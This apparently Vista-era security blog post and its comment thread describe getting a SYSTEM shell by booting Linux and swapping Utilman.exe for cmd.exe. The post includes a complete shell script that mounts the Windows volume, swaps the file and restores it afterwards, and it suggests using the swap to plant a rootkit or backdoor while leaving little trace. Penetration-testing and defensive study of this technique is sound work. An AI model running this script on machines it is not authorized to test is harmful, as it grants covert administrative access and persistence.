Edit: The real action’s going on down below here in the comments. Be sure to catch up on them after you read the post.
Jesse Varsalone, a computer forensics expert who happens to be a reader of this site, just emailed me a link to a cool video where he demonstrates a quick and easy way of obtaining SYSTEM privileges on a Vista system, given physical access to the machine. In the video, he boots BackTrack, mounts the Windows volume, and replaces Utilman.exe with a copy of cmd.exe. The nice thing about replacing Utilman.exe is that Windows will launch it from the logon screen, before anyone is logged in, when you press Windows-U, so the replacement runs with SYSTEM privileges rather than as a logged-in user. The video is available on the Offensive Security (maintainers of BackTrack) site:
If you’re into doing physical-presence penetration tests, you might want to roll your own custom CD or bootable USB drive that boots faster than BackTrack and automatically swaps Utilman.exe out for the executable of your choice: perhaps something that installs a nice rootkit or a Core Impact agent, and then puts the real Utilman.exe back in its rightful place so the swap leaves as little trace as possible.
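As an added example (not Jesse’s video or anything from the BackTrack project), here is the mount-and-replace step scripted the way a custom boot disc might run it, with a restore mode that puts the original Utilman.exe back. It assumes the Windows volume is already mounted read-write (for example with ntfs-3g) at the path you pass in, and that the default Windows\System32 layout is in place; the optional `mount_first_ntfs` helper, which needs root and ntfs-3g, is an assumption about the live environment and is not exercised by the functions above it. Because ntfs-3g mounts are case-sensitive on the Linux side while the files on disk may be `Utilman.exe` or `utilman.exe`, the script locates them case-insensitively.

```shell
#!/bin/sh
# Added example: swap Utilman.exe for another executable on a mounted Windows
# volume from a live Linux, and restore it afterwards.
# Usage: utilman_swap.sh swap|restore <mounted-windows-root> [replacement]
# Assumptions (not from the original post): the volume is already mounted
# read-write, and Windows/System32 exists under the given root.
set -eu

# find_file DIR NAME: print the first entry in DIR whose name matches NAME
# case-insensitively (empty output if none).
find_file() {
    find "$1" -mindepth 1 -maxdepth 1 -iname "$2" -print | head -n 1
}

# system32_dir ROOT: print ROOT/Windows/System32, whatever its on-disk case.
system32_dir() {
    win=$(find_file "$1" windows)
    [ -n "$win" ] || { echo "no Windows directory under $1" >&2; return 1; }
    sys=$(find_file "$win" system32)
    [ -n "$sys" ] || { echo "no System32 directory under $win" >&2; return 1; }
    printf '%s\n' "$sys"
}

# utilman_swap ROOT [REPLACEMENT]: back up Utilman.exe as utilman.exe.orig and
# copy REPLACEMENT (a path, or a file name inside System32; default cmd.exe)
# over it. Refuses to run twice so the backup is never overwritten.
utilman_swap() {
    root=$1; repl=${2:-cmd.exe}
    sys=$(system32_dir "$root") || return 1
    util=$(find_file "$sys" utilman.exe)
    [ -n "$util" ] || { echo "utilman.exe not found in $sys" >&2; return 1; }
    if [ -e "$sys/utilman.exe.orig" ]; then
        echo "backup already present; refusing to swap twice" >&2; return 1
    fi
    case $repl in
        */*) src=$repl ;;                       # explicit path to a replacement
        *)   src=$(find_file "$sys" "$repl") ;; # a file already in System32
    esac
    [ -n "$src" ] && [ -f "$src" ] || { echo "replacement $repl not found" >&2; return 1; }
    cp -p "$util" "$sys/utilman.exe.orig"       # keep original bytes and timestamps
    cp "$src" "$util"
    echo "swapped $util <- $src"
}

# utilman_restore ROOT: put the backed-up original back and remove the backup.
utilman_restore() {
    root=$1
    sys=$(system32_dir "$root") || return 1
    util=$(find_file "$sys" utilman.exe)
    [ -f "$sys/utilman.exe.orig" ] || { echo "no backup to restore in $sys" >&2; return 1; }
    cp -p "$sys/utilman.exe.orig" "$util"
    rm -f "$sys/utilman.exe.orig"
    echo "restored $util"
}

# mount_first_ntfs MOUNTPOINT: mount the first NTFS partition read-write.
# Assumption about the live environment: blkid and ntfs-3g are available and
# we are root. Not exercised by the functions above.
mount_first_ntfs() {
    dev=$(blkid -t TYPE=ntfs -o device | head -n 1)
    [ -n "$dev" ] || { echo "no NTFS partition found" >&2; return 1; }
    mkdir -p "$1"
    ntfs-3g "$dev" "$1"
}

# Command-line dispatch; does nothing when sourced without arguments.
if [ $# -ge 2 ]; then
    case $1 in
        swap)    utilman_swap "$2" "${3:-cmd.exe}" ;;
        restore) utilman_restore "$2" ;;
        mount)   mount_first_ntfs "$2" ;;
        *)       echo "usage: $0 swap|restore|mount <path> [replacement]" >&2; exit 2 ;;
    esac
fi
```

Run `sh utilman_swap.sh mount /mnt/win` then `sh utilman_swap.sh swap /mnt/win` from the live system, reboot into Windows and press Windows-U at the logon screen; run `sh utilman_swap.sh restore /mnt/win` from the live system afterwards to clean up. Keeping the backup next to the original, rather than in memory, is what makes the restore step survive a reboot in between.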
Thanks Jesse! Excellent choice of soundtrack as well!

Big deal. You can do this in 2000 and XP as well.
I’m sorry, but this is just stupid. If you have sufficient physical access to the computer to boot off a Linux boot disk, then, if there’s no encryption, you’ve got arbitrary read and write access to all the files on the machine, so why on earth is it a surprise that you’ve got admin access to it?!
Hell, you don’t even need to bother with a Linux boot disc: if you have physical access to a box, just press F8 on startup (or on Linux, append S to the GRUB kernel line) and boot into single user mode.
Physical access -> admin access is one of the fundamental, immutable laws of computer security. I can’t believe that something like this was posted to a ‘security’ blog.
I agree that it’s not surprising, and that with physical access all bets are off. I simply hadn’t seen it done like this before, and thought it was a neat trick.
Not everything posted here is going to be groundbreaking, and I never claimed it would be. Sometimes it’s just like I said it was: a quick and easy trick that you might get some use out of.
Thanks for the comments!
Alright, I’ve eaten my breakfast and had a little more time to reflect on the comments.
First of all, thanks for mentioning that this works on 2k/XP, Marcin. I was under the impression, from the email I received about it, that it didn’t, however I just booted up an XP VM, and it seems that I can run Utilman with Windows-U before logging in on it too. It stands to reason that the same trick would work then.
And as for Simon, I reflected on your comment over my eggs and grits. You make some good points, and your facts are all straight. In the absence of good whole-disk encryption (with the disks unmounted and keys properly dealt with), physical access does mean admin access. I, and most of my usual readers, have poked around in filesystems from a boot disk, reset passwords, etc.
You’re saying it’s stupid, but I think you may have gotten the wrong impression from the post. I apologize if it seemed like I was claiming it was a “surprise”, because I didn’t really intend to present it as a vulnerability or surprising result. That’s why, unlike the Slashdot article about the same video, I didn’t present it as a “vulnerability” or “security hole”, because it’s not, really.
It’s a clever trick that I believe some practitioners who read this blog might be interested in. It’s the same thing as many pentesters are already doing with boot discs and such, only it has some desirable traits: it’s easy to automate a quick mount-and-replace, and it has low impact on the system (if what you replace it with cleans up after itself by putting Utilman back).
So, I agree with you that it’s not surprising or a new vulnerability. I still think that it’s a nice trick to quickly deploy a backdoor or rootkit with physical access to the machine, despite the fact that it’s roughly equivalent to other things you might do (full-on boot cd’s and single user/safe mode).
The comments are great though: they add some value to the post and let us expand upon it with some discussion. I hope you keep reading this ‘security’ blog, Simon.
We did some playing with this at work and could not get it to work with XP.
Anybody else actually try it and get it to work, or just talking shizzle?
I did find this, which said you had to do some dll patching:
http://blog.didierstevens.com/2006/08/31/my-second-playdate-with-utilmanexe/
http://blog.didierstevens.com/2006/08/21/playing-with-utilmanexe/
I haven’t tried it with XP. Strange that XP would check to see if the file has been modified, if Vista doesn’t. Either way, as has been stated earlier in this discussion, if you can get on there to modify utilman, patching or replacing that dll while you’re on the filesystem is also doable.
Thanks for the links!
I’ve just read the original post again, and you’re right, you didn’t present it as a security hole, which was how I interpreted the post, and my comment was unnecessarily confrontational as a result; so apologies for that.
In my defense, I’d just spent an hour on Slashdot arguing about exactly this with a thousand monkeys at a thousand typewriters who thought it *was* a security hole, so I was probably predisposed to read that into your post (plus my blood was up).
No worries. I was just happy someone cared enough about what was posted here to call me out on it!
For a tech blog that’s been around for so many eons, it’s fascinating how screwed up security-related posts can get on slashdot.
To get this working on XP, you need to do 2 things:
1) Disable Windows File Protection for utilman.exe. Otherwise, the original will be put back in the system32 folder. Vista still protects system files, but doesn’t fix them automatically like XP does.
2) Write a little C program that starts cmd.exe on the correct Windows station (WinSta0) and desktop (Winlogon). Have to find out why you don’t need to do this on Vista.